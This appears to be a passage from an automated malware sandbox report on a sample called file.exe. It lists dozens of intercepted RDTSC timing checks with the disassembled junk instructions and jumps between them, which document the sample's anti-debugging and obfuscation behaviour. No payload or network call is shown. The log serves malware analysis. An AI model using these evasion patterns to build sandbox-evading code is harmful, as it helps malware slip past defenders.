              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D558B second address: 4D5590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5AD9 second address: 4D5AE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB560E14CDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5EE4 second address: 4D5EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5EEE second address: 4D5EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5EF4 second address: 4D5EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62EF second address: 4D62F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D68A7 second address: 4D68BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5613DF5B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D68BF second address: 4D68EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB560E14CD8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pushad 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D68EA second address: 4D68F8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB5613DF5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB926 second address: 4DB93D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14CE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB93D second address: 4DB95E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB5613DF5A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FB5613DF5ADh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB95E second address: 4DB99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14CDFh 0x00000009 popad 0x0000000a jmp 00007FB560E14CE9h 0x0000000f jbe 00007FB560E14CDCh 0x00000015 js 00007FB560E14CD6h 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007FB560E14CD6h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DBAFA second address: 4DBB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FB5613DF5A6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DBB07 second address: 4DBB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB560E14CD6h 0x0000000a jo 00007FB560E14CD6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC4EF second address: 4DC4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC943 second address: 4DC947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4A3A second address: 4E4A40 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5A2E second address: 482320 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FB560E14CE8h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FB560E14CD8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edx, dword ptr [ebp+122D290Dh] 0x00000030 call dword ptr [ebp+122D1B33h] 0x00000036 jmp 00007FB560E14CDBh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FB560E14CE5h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB560E14CE9h 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5E3D second address: 4A5E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB5613DF5A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5FF4 second address: 4A601B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 495B5F10h 0x00000012 pushad 0x00000013 jg 00007FB560E14CD9h 0x00000019 popad 0x0000001a push E14F619Fh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A601B second address: 4A601F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6461 second address: 4A64CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnc 00007FB560E14CD6h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FB560E14CD8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f push 00000004h 0x00000031 jmp 00007FB560E14CE7h 0x00000036 nop 0x00000037 je 00007FB560E14CDEh 0x0000003d ja 00007FB560E14CD8h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jno 00007FB560E14CDCh 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6825 second address: 4A6867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FB5613DF5A8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 add dword ptr [ebp+12452BF6h], ebx 0x0000002d push 0000001Eh 0x0000002f push eax 0x00000030 pushad 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6BB2 second address: 4A6BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FB560E14CE5h 0x0000000e jmp 00007FB560E14CDFh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6BCF second address: 4A6C1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB5613DF5B3h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnc 00007FB5613DF5B8h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop ecx 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 pop edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jc 00007FB5613DF5A6h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6D3B second address: 4A6D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6D3F second address: 4A6D68 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub di, 5C5Ah 0x0000000e lea eax, dword ptr [ebp+12489752h] 0x00000014 mov edx, dword ptr [ebp+122D2498h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007FB5613DF5ACh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6D68 second address: 4A6D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6D6E second address: 482E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov ah, 4Ch 0x00000011 mov eax, esi 0x00000013 popad 0x00000014 call dword ptr [ebp+122D2E0Bh] 0x0000001a push ecx 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 push esi 0x00000021 jc 00007FB5613DF5A8h 0x00000027 push edi 0x00000028 pop edi 0x00000029 push ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3B79 second address: 4E3B83 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB560E14CD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3B83 second address: 4E3BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB5613DF5B4h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3BA1 second address: 4E3BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3CF3 second address: 4E3D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5613DF5ADh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3D06 second address: 4E3D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E417F second address: 4E4183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E42E8 second address: 4E4322 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB560E14CD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB560E14CE7h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 jmp 00007FB560E14CDBh 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4322 second address: 4E4326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E45E9 second address: 4E45EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E77FC second address: 4E7806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7806 second address: 4E780B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E780B second address: 4E782E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB5613DF5A8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FB5613DF5B5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E782E second address: 4E7832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9E64 second address: 4E9E6E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB5613DF5AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9A0E second address: 4E9A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9A16 second address: 4E9A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9B98 second address: 4E9B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9B9D second address: 4E9BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5B8h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECEAB second address: 4ECEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FB560E14CDEh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45A7E1 second address: 45A803 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB560E14C49h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC7B2 second address: 4EC7D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB806h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FB560CBB7FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC7D4 second address: 4EC7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC7D8 second address: 4EC7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB560CBB7FDh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECA97 second address: 4ECA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F07A6 second address: 4F07AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6C14 second address: 4F6C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB560E14C36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6C26 second address: 4F6C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F6C32 second address: 4F6C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FB560E14C36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F564D second address: 4F5653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5653 second address: 4F566A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C41h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F566A second address: 4F5670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5670 second address: 4F5674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5674 second address: 4F5690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FB560CBB802h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FB560CBB7FAh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5690 second address: 4F569A instructions: 0x00000000 rdtsc 0x00000002 js 00007FB560E14C42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F581A second address: 4F5856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB560CBB7FCh 0x0000000f ja 00007FB560CBB7F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB560CBB806h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F599A second address: 4F59C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C49h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB560E14C36h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F59C2 second address: 4F59C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5C73 second address: 4F5C7D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB560E14C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5C7D second address: 4F5CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FB560CBB800h 0x00000010 jmp 00007FB560CBB809h 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FB560CBB7F6h 0x0000001d jmp 00007FB560CBB7FDh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5CC6 second address: 4F5CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A667E second address: 4A66D1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB560CBB7F8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FB560CBB806h 0x00000012 mov ebx, dword ptr [ebp+12489791h] 0x00000018 mov dx, si 0x0000001b mov di, cx 0x0000001e add eax, ebx 0x00000020 mov dword ptr [ebp+122D1FC3h], eax 0x00000026 call 00007FB560CBB7FDh 0x0000002b push edi 0x0000002c xor edx, dword ptr [ebp+122D3A9Bh] 0x00000032 pop edx 0x00000033 pop edi 0x00000034 nop 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A66D1 second address: 4A66DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A66DE second address: 4A66E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A66E2 second address: 4A66EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A66EB second address: 4A670A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB560CBB7F6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov dx, cx 0x00000010 push 00000004h 0x00000012 sub dword ptr [ebp+122D2A2Ch], edx 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A670A second address: 4A6714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB560E14C36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6714 second address: 4A6736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB802h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FB560CBB7F6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F68F6 second address: 4F6901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA466 second address: 4FA492 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB560CBB801h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB560CBB7FAh 0x00000013 push ecx 0x00000014 je 00007FB560CBB7F6h 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA62D second address: 4FA646 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB560E14C36h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007FB560E14C6Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA7BC second address: 4FA7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560CBB800h 0x00000009 popad 0x0000000a jmp 00007FB560CBB7FEh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA7DF second address: 4FA7E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA7E5 second address: 4FA7EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA7EB second address: 4FA80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB560E14C47h 0x0000000d rdtsc
